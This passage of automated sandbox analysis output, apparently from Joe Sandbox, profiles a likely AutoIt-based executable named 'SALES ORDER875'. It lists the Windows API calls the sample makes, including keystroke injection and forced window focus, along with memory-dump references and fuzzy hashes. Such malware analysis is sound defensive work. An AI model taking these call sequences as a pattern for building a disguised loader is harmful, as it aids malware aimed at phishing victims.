                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00451418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00384F6D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: af792d364e0e3cbd49b6f97423818eeca6c4224645ab637ce10d74731f632be0
                                                                                                                                                                                    • Instruction ID: fbc2d10ffb0488095db146a88c287ff469599e7323ef5825665d5af398d208a5
                                                                                                                                                                                    • Opcode Fuzzy Hash: af792d364e0e3cbd49b6f97423818eeca6c4224645ab637ce10d74731f632be0
                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F03071105752CFDB35AF64D490812B7E4FF1531931589BEE2DA82921C7319844DF10
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,003CEE51,00443630,00000002), ref: 003ECD26
                                                                                                                                                                                      • Part of subcall function 003ECC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,003ECD19,?,?,?), ref: 003ECC59
                                                                                                                                                                                      • Part of subcall function 003ECC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,003ECD19,?,?,?,?,003CEE51,00443630,00000002), ref: 003ECC6E
                                                                                                                                                                                      • Part of subcall function 003ECC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,003ECD19,?,?,?,?,003CEE51,00443630,00000002), ref: 003ECC7A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Pointer$Write
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3847668363-0
                                                                                                                                                                                    • Opcode ID: c0fb067aafa3a050317cf14842a1e0b4b256fcdb4a6aa0a5c9e5bef2b5779d30
                                                                                                                                                                                    • Instruction ID: 1d6718a2d0bb3d2503ee7f31dba29e20d2343165726cf4d723aba264798bd54b
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0fb067aafa3a050317cf14842a1e0b4b256fcdb4a6aa0a5c9e5bef2b5779d30
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CE0397A500614EFC7229F8ADD408AABBF8FF84260710862FE99682110D7B1AA55DB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00382DC4
                                                                                                                                                                                      • Part of subcall function 00386B57: _wcslen.LIBCMT ref: 00386B6A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 541455249-0
                                                                                                                                                                                    • Opcode ID: 5614ae76cf5f1e271603fd91d0d2d615f3a54d1cf3cc84c9574bf0ff9ef40dc4
                                                                                                                                                                                    • Instruction ID: 74a901f861c7151a1bca0844e13e95edd1a9c19fc5de360f1c720cff03f2214d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5614ae76cf5f1e271603fd91d0d2d615f3a54d1cf3cc84c9574bf0ff9ef40dc4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20E0CD72A002245BC711A2589C06FDA77DDDFC8790F0441B5FD09D7248D970ED808650
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00383837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00383908
                                                                                                                                                                                      • Part of subcall function 0038D730: GetInputState.USER32 ref: 0038D807
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00382B6B
                                                                                                                                                                                      • Part of subcall function 003830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0038314E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3667716007-0
                                                                                                                                                                                    • Opcode ID: 4d80f87f6bccb6d8af612c6a56ab59a54b4237930886b13d4cf0d26cb107030e
                                                                                                                                                                                    • Instruction ID: 7ca674ef67cdce11ef2412066388f7d1994101809a50f6266409bdaec545c8ee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d80f87f6bccb6d8af612c6a56ab59a54b4237930886b13d4cf0d26cb107030e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 14E0862130434407CA06BB74A8526BDA7599BD2756F4055BEF5464B2A3CF2489494356
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,003C0704,?,?,00000000,?,003C0704,00000000,0000000C), ref: 003C03B7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: c73b4bacd5e33c5dc0c1f8bb1d2982342d35f43ec027d7780bf39f14e2878d27
                                                                                                                                                                                    • Instruction ID: 6991208bdbe54eb65c013cbcb80938222b581af6a7352b65ecaead2e5cfb7bdb
                                                                                                                                                                                    • Opcode Fuzzy Hash: c73b4bacd5e33c5dc0c1f8bb1d2982342d35f43ec027d7780bf39f14e2878d27
                                                                                                                                                                                    • Instruction Fuzzy Hash: 52D06C3208010DBBDF028F84DD46EDA3BAAFB48714F018010BE1856020C732E821AB94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00381CBC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoParametersSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3098949447-0
                                                                                                                                                                                    • Opcode ID: 64bb64dd054287ea4d65ea728d40a65bb13309f5028552c2a99007e0073e8a80
                                                                                                                                                                                    • Instruction ID: 423ef1fb7143e63db1ca6bd3d56092886ceddf24bd12af27c5d712307b4661af
                                                                                                                                                                                    • Opcode Fuzzy Hash: 64bb64dd054287ea4d65ea728d40a65bb13309f5028552c2a99007e0073e8a80
                                                                                                                                                                                    • Instruction Fuzzy Hash: F3C09B352C0314BFF2154780BD5AF507755A348B01F048411F609555F3D3E15410D658
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00385745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0038949C,?,00008000), ref: 00385773
                                                                                                                                                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 003F76DE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1214770103-0
                                                                                                                                                                                    • Opcode ID: 0998982d2b437556eb2b584063f7b2b0a93c261e00edfd2ca01d4c2a1402a7a7
                                                                                                                                                                                    • Instruction ID: 44f2af6af14dafab7c38e369defff1e87a24c373e4d8e91361d299bcb4329d15
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0998982d2b437556eb2b584063f7b2b0a93c261e00edfd2ca01d4c2a1402a7a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 14819F302087059FCB16EF28C491B79B7E1AF89314F0545ADF9869F2A2DB30ED45CB92
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 01A8FFE1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                    • Instruction ID: cb705db72d6ca4736655a07e5aa43e4dabd512e43b64b9317330fbce756ebc6c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                    • Instruction Fuzzy Hash: FFE0BF7494410EEFDB00EFA4D5496DE7BB4EF04301F1005A1FD05D7681DB309E548A62
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,00000000,003C24E0), ref: 00386266
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                    • Opcode ID: e1a2d89d1a41709b6f859c0530a9ec6648f2333265f244d66bb47e006033a0d9
                                                                                                                                                                                    • Instruction ID: c2d03a94f2c85d7bd3547723ea451ec4935c9d143c06cd28a9831debd2959bb1
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1a2d89d1a41709b6f859c0530a9ec6648f2333265f244d66bb47e006033a0d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 26E09275400B11CEC3725F1AE819452FBE9FEE13613218EAED4E592660D3B058868B50
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 01A8FFE1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                    • Instruction ID: cdd43d870cc22abd0c8dd1490060b281320b4a9334d5ed5fd2beb871ea13ffdc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CE0E67494410EDFDB00EFB4D54969E7FB4EF04301F100161FD01D2281DB309E508A62
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00399BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00399BB2
                                                                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0041961A
                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0041965B
                                                                                                                                                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0041969F
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004196C9
                                                                                                                                                                                    • SendMessageW.USER32 ref: 004196F2
                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0041978B
                                                                                                                                                                                    • GetKeyState.USER32(00000009), ref: 00419798
                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004197AE
                                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 004197B8
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004197E9
                                                                                                                                                                                    • SendMessageW.USER32 ref: 00419810
                                                                                                                                                                                    • SendMessageW.USER32(?,00001030,?,00417E95), ref: 00419918
                                                                                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0041992E
                                                                                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00419941
                                                                                                                                                                                    • SetCapture.USER32(?), ref: 0041994A
                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 004199AF
                                                                                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004199BC
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004199D6
                                                                                                                                                                                    • ReleaseCapture.USER32 ref: 004199E1
                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00419A19
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00419A26
                                                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00419A80
                                                                                                                                                                                    • SendMessageW.USER32 ref: 00419AAE
                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00419AEB
                                                                                                                                                                                    • SendMessageW.USER32 ref: 00419B1A
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00419B3B
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00419B4A
                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00419B68
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00419B75
                                                                                                                                                                                    • GetParent.USER32(?), ref: 00419B93
                                                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00419BFA
                                                                                                                                                                                    • SendMessageW.USER32 ref: 00419C2B
                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00419C84
                                                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00419CB4
                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00419CDE
                                                                                                                                                                                    • SendMessageW.USER32 ref: 00419D01
                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00419D4E
                                                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00419D82
                                                                                                                                                                                      • Part of subcall function 00399944: GetWindowLongW.USER32(?,000000EB), ref: 00399952
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00419E05
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                                                                                    • String ID: @GUI_DRAGID$F$p#E
                                                                                                                                                                                    • API String ID: 3429851547-3988730002
                                                                                                                                                                                    • Opcode ID: 6b5be79641f157205f47723d6185199e9587ac35070d31ef199819c52615ce32
                                                                                                                                                                                    • Instruction ID: a7bbf526d2728f3a4ff9bdfb961dbd3ebbf749f6f52531a48143a01ebba39a5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b5be79641f157205f47723d6185199e9587ac35070d31ef199819c52615ce32
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B425A74204201EFDB25CF24CC94BEABBE5FF89310F14462AF699872A1D735AC91CB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 004148F3
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00414908
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00414927
                                                                                                                                                                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0041494B
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0041495C
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0041497B
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 004149AE
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 004149D4
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00414A0F
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00414A56
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00414A7E
                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00414A97
                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00414AF2
                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00414B20
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414B94
                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00414BE3
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00414C82
                                                                                                                                                                                    • wsprintfW.USER32 ref: 00414CAE
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00414CC9
                                                                                                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00414CF1
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00414D13
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00414D33
                                                                                                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00414D5A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                                                                                    • API String ID: 4054740463-328681919
                                                                                                                                                                                    • Opcode ID: 72cef7283338a04a4bdf7e91aea630924383bc69f76bf68bb3ac6a4d3cda9ae1
                                                                                                                                                                                    • Instruction ID: 076abdd12740eeedfe3f0deea6e3a447ae9f10a17919cadc6a07f3b51549ab31
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72cef7283338a04a4bdf7e91aea630924383bc69f76bf68bb3ac6a4d3cda9ae1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F12FE71600214AFEB259F28CC49FEF7BB8EF85310F10412AF515DA2E1DB789982CB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0039F998
                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003DF474
                                                                                                                                                                                    • IsIconic.USER32(00000000), ref: 003DF47D
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 003DF48A
                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 003DF494
                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003DF4AA
                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003DF4B1
                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003DF4BD
                                                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 003DF4CE
                                                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 003DF4D6
                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 003DF4DE
                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 003DF4E1
                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003DF4F6
                                                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 003DF501
                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003DF50B
                                                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 003DF510
                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003DF519
                                                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 003DF51E
                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003DF528
                                                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 003DF52D
                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 003DF530
                                                                                                                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 003DF557
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
